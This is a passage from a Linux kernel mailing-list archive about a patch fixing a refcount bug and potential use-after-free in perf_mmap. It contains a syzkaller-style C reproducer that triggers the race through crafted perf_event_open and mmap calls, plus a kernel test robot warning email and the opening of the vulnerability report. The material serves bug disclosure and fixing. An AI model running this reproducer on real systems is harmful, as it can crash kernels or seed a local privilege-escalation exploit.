#define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \
*(type*)(addr) = \
htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \
(((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len))))
uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
int main(void)
{
syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul,
/*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
const char* reason;
(void)reason;
install_segv_handler();
intptr_t res = 0;
if (write(1, "executing program\n", sizeof("executing program\n") - 1)) {
}
// pkey_mprotect arguments: [
// addr: VMA[0x2000]
// len: len = 0x2000 (8 bytes)
// prot: mmap_prot = 0x5 (8 bytes)
// key: pkey (resource)
// ]
syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul,
/*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x8 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/(intptr_t)-1,
/*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul);
if (res != -1)
r[0] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x0 (8 bytes)
// flags: mmap_flags = 0x11 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul, /*fd=*/r[0], /*offset=*/0ul);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x2 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/r[0], /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul);
if (res != -1)
r[1] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x100000b (8 bytes)
// flags: mmap_flags = 0x13 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul,
/*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul,
/*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul, /*fd=*/r[1],
/*offset=*/0ul);
return 0;
}
Hi Haocheng,
kernel test robot noticed the following build warnings:
[auto build test WARNING on perf-tools-next/perf-tools-next]
[also build test WARNING on tip/perf/core perf-tools/perf-tools linus/master v6.19-rc7 next-20260130]
[cannot apply to acme/perf/core]
[If your patch is applied to the wrong git tree, kindly drop us a note.
And when submitting patch, we suggest to use '--base' as documented in
https://git-scm.com/docs/git-format-patch#_base_tree_information]
url: https://github.com/intel-lab-lkp/linux/commits/Haocheng-Yu/perf-core-Fix-refcount-bug-and-potential-UAF-in-perf_mmap/20260201-193746
base: https://git.kernel.org/pub/scm/linux/kernel/git/perf/perf-tools-next.git perf-tools-next
patch link: https://lore.kernel.org/r/20260201113446.4328-1-yuhaocheng035%40gmail.com
patch subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
config: mips-randconfig-r072-20260201 (https://download.01.org/0day-ci/archive/20260202/202602020208.m7KIjdzW-lkp@intel.com/config)
compiler: clang version 22.0.0git (https://github.com/llvm/llvm-project 9b8addffa70cee5b2acc5454712d9cf78ce45710)
smatch version: v0.5.0-8994-gd50c5a4c
If you fix the issue in a separate patch/commit (i.e. not just a new version of
the same patch/commit), kindly add following tags
| Reported-by: kernel test robot <lkp@intel.com>
| Closes: https://lore.kernel.org/oe-kbuild-all/202602020208.m7KIjdzW-lkp@intel.com/
smatch warnings:
kernel/events/core.c:7183 perf_mmap() warn: inconsistent indenting
vim +7183 kernel/events/core.c
7b732a75047738 kernel/perf_counter.c Peter Zijlstra 2009-03-23 7131
37d81828385f8f kernel/perf_counter.c Paul Mackerras 2009-03-23 7132 static int perf_mmap(struct file *file, struct vm_area_struct *vma)
37d81828385f8f kernel/perf_counter.c Paul Mackerras 2009-03-23 7133 {
cdd6c482c9ff9c kernel/perf_event.c Ingo Molnar 2009-09-21 7134 struct perf_event *event = file->private_data;
81e026ca47b386 kernel/events/core.c Thomas Gleixner 2025-08-12 7135 unsigned long vma_size, nr_pages;
da916e96e2dedc kernel/events/core.c Peter Zijlstra 2024-10-25 7136 mapped_f mapped;
5d299897f1e360 kernel/events/core.c Peter Zijlstra 2025-08-12 7137 int ret;
d57e34fdd60be7 kernel/perf_event.c Peter Zijlstra 2010-05-28 7138
c7920614cebbf2 kernel/perf_event.c Peter Zijlstra 2010-05-18 7139 /*
c7920614cebbf2 kernel/perf_event.c Peter Zijlstra 2010-05-18 7140 * Don't allow mmap() of inherited per-task counters. This would
c7920614cebbf2 kernel/perf_event.c Peter Zijlstra 2010-05-18 7141 * create a performance issue due to all children writing to the
76369139ceb955 kernel/events/core.c Frederic Weisbecker 2011-05-19 7142 * same rb.
c7920614cebbf2 kernel/perf_event.c Peter Zijlstra 2010-05-18 7143 */
c7920614cebbf2 kernel/perf_event.c Peter Zijlstra 2010-05-18 7144 if (event->cpu == -1 && event->attr.inherit)
c7920614cebbf2 kernel/perf_event.c Peter Zijlstra 2010-05-18 7145 return -EINVAL;
4ec8363dfc1451 kernel/events/core.c Vince Weaver 2011-06-01 7146
43a21ea81a2400 kernel/perf_counter.c Peter Zijlstra 2009-03-25 7147 if (!(vma->vm_flags & VM_SHARED))
37d81828385f8f kernel/perf_counter.c Paul Mackerras 2009-03-23 7148 return -EINVAL;
26cb63ad11e040 kernel/events/core.c Peter Zijlstra 2013-05-28 7149
da97e18458fb42 kernel/events/core.c Joel Fernandes (Google 2019-10-14 7150) ret = security_perf_event_read(event);
da97e18458fb42 kernel/events/core.c Joel Fernandes (Google 2019-10-14 7151) if (ret)
da97e18458fb42 kernel/events/core.c Joel Fernandes (Google 2019-10-14 7152) return ret;
26cb63ad11e040 kernel/events/core.c Peter Zijlstra 2013-05-28 7153
7b732a75047738 kernel/perf_counter.c Peter Zijlstra 2009-03-23 7154 vma_size = vma->vm_end - vma->vm_start;
0c8a4e4139adf0 kernel/events/core.c Peter Zijlstra 2024-11-04 7155 nr_pages = vma_size / PAGE_SIZE;
ac9721f3f54b27 kernel/perf_event.c Peter Zijlstra 2010-05-27 7156
0c8a4e4139adf0 kernel/events/core.c Peter Zijlstra 2024-11-04 7157 if (nr_pages > INT_MAX)
0c8a4e4139adf0 kernel/events/core.c Peter Zijlstra 2024-11-04 7158 return -ENOMEM;
9a0f05cb368885 kernel/events/core.c Peter Zijlstra 2011-11-21 7159
0c8a4e4139adf0 kernel/events/core.c Peter Zijlstra 2024-11-04 7160 if (vma_size != PAGE_SIZE * nr_pages)
0c8a4e4139adf0 kernel/events/core.c Peter Zijlstra 2024-11-04 7161 return -EINVAL;
45bfb2e50471ab kernel/events/core.c Peter Zijlstra 2015-01-14 7162
d23a6dbc0a7174 kernel/events/core.c Peter Zijlstra 2025-08-12 7163 scoped_guard (mutex, &event->mmap_mutex) {
da916e96e2dedc kernel/events/core.c Peter Zijlstra 2024-10-25 7164 /*
da916e96e2dedc kernel/events/core.c Peter Zijlstra 2024-10-25 7165 * This relies on __pmu_detach_event() taking mmap_mutex after marking
da916e96e2dedc kernel/events/core.c Peter Zijlstra 2024-10-25 7166 * the event REVOKED. Either we observe the state, or __pmu_detach_event()
da916e96e2dedc kernel/events/core.c Peter Zijlstra 2024-10-25 7167 * will detach the rb created here.
da916e96e2dedc kernel/events/core.c Peter Zijlstra 2024-10-25 7168 */
d23a6dbc0a7174 kernel/events/core.c Peter Zijlstra 2025-08-12 7169 if (event->state <= PERF_EVENT_STATE_REVOKED)
d23a6dbc0a7174 kernel/events/core.c Peter Zijlstra 2025-08-12 7170 return -ENODEV;
37d81828385f8f kernel/perf_counter.c Paul Mackerras 2009-03-23 7171
5d299897f1e360 kernel/events/core.c Peter Zijlstra 2025-08-12 7172 if (vma->vm_pgoff == 0)
5d299897f1e360 kernel/events/core.c Peter Zijlstra 2025-08-12 7173 ret = perf_mmap_rb(vma, event, nr_pages);
5d299897f1e360 kernel/events/core.c Peter Zijlstra 2025-08-12 7174 else
2aee3768239133 kernel/events/core.c Peter Zijlstra 2025-08-12 7175 ret = perf_mmap_aux(vma, event, nr_pages);
07091aade394f6 kernel/events/core.c Thomas Gleixner 2025-08-02 7176 if (ret)
07091aade394f6 kernel/events/core.c Thomas Gleixner 2025-08-02 7177 return ret;
07091aade394f6 kernel/events/core.c Thomas Gleixner 2025-08-02 7178
9bb5d40cd93c9d kernel/events/core.c Peter Zijlstra 2013-06-04 7179 /*
9bb5d40cd93c9d kernel/events/core.c Peter Zijlstra 2013-06-04 7180 * Since pinned accounting is per vm we cannot allow fork() to copy our
9bb5d40cd93c9d kernel/events/core.c Peter Zijlstra 2013-06-04 7181 * vma.
9bb5d40cd93c9d kernel/events/core.c Peter Zijlstra 2013-06-04 7182 */
1c71222e5f2393 kernel/events/core.c Suren Baghdasaryan 2023-01-26 @7183 vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
37d81828385f8f kernel/perf_counter.c Paul Mackerras 2009-03-23 7184 vma->vm_ops = &perf_mmap_vmops;
7b732a75047738 kernel/perf_counter.c Peter Zijlstra 2009-03-23 7185
da916e96e2dedc kernel/events/core.c Peter Zijlstra 2024-10-25 7186 mapped = get_mapped(event, event_mapped);
da916e96e2dedc kernel/events/core.c Peter Zijlstra 2024-10-25 7187 if (mapped)
da916e96e2dedc kernel/events/core.c Peter Zijlstra 2024-10-25 7188 mapped(event, vma->vm_mm);
1e0fb9ec679c92 kernel/events/core.c Andy Lutomirski 2014-10-24 7189
f74b9f4ba63ffd kernel/events/core.c Thomas Gleixner 2025-08-02 7190 /*
f74b9f4ba63ffd kernel/events/core.c Thomas Gleixner 2025-08-02 7191 * Try to map it into the page table. On fail, invoke
f74b9f4ba63ffd kernel/events/core.c Thomas Gleixner 2025-08-02 7192 * perf_mmap_close() to undo the above, as the callsite expects
f74b9f4ba63ffd kernel/events/core.c Thomas Gleixner 2025-08-02 7193 * full cleanup in this case and therefore does not invoke
f74b9f4ba63ffd kernel/events/core.c Thomas Gleixner 2025-08-02 7194 * vmops::close().
f74b9f4ba63ffd kernel/events/core.c Thomas Gleixner 2025-08-02 7195 */
191759e5ea9f69 kernel/events/core.c Peter Zijlstra 2025-08-12 7196 ret = map_range(event->rb, vma);
f74b9f4ba63ffd kernel/events/core.c Thomas Gleixner 2025-08-02 7197 if (ret)
f74b9f4ba63ffd kernel/events/core.c Thomas Gleixner 2025-08-02 7198 perf_mmap_close(vma);
8f75f689bf8133 kernel/events/core.c Haocheng Yu 2026-02-01 7199 }
f74b9f4ba63ffd kernel/events/core.c Thomas Gleixner 2025-08-02 7200
7b732a75047738 kernel/perf_counter.c Peter Zijlstra 2009-03-23 7201 return ret;
37d81828385f8f kernel/perf_counter.c Paul Mackerras 2009-03-23 7202 }
37d81828385f8f kernel/perf_counter.c Paul Mackerras 2009-03-23 7203
--
0-DAY CI Kernel Test Service
https://github.com/intel/lkp-tests/wiki
|
{
"author": "kernel test robot <lkp@intel.com>",
"date": "Mon, 2 Feb 2026 02:43:48 +0800",
"thread_id": "CAAoXzSqHuQd7k9rp878YBG5gbChgOaProPQ6XBzKpy81JF5sKg@mail.gmail.com.mbox.gz"
}
|
lkml
|
[PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
|
Hello,
I would like to report a reference counting vulnerability in the Linux kernel perf_event subsystem, which I discovered using a modified syzkaller-based kernel fuzzing tool that I developed.
Summary
-------
A local user can trigger a reference count saturation or a use-after-free (UAF) vulnerability in the perf_mmap function. This is caused by a race condition where a ring_buffer object's reference count is incremented after it has already reached zero.
The vulnerability exists in the perf_mmap() function in kernel/events/core.c. While the function uses mmap_mutex to protect the initial buffer setup, it performs subsequent operations (such as map_range) on event->rb outside of the locked scope. If the event is closed or the buffer is detached concurrently, the reference count of the ring_buffer can drop to zero, leading to an 'addition on 0' warning or a UAF when the kernel attempts to access or increment it later.
I verified this on Linux kernel version 6.18.5.
Environment
-----------
- Kernel version: 6.18.5 (the complete config is attached)
- Architecture: x86_64
- Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.13.0-1ubuntu1.1)
Symptoms and logs
-----------------
The kernel triggers a 'refcount_t: addition on 0; use-after-free' warning followed by a memory leak warning.
The full report is as follows:
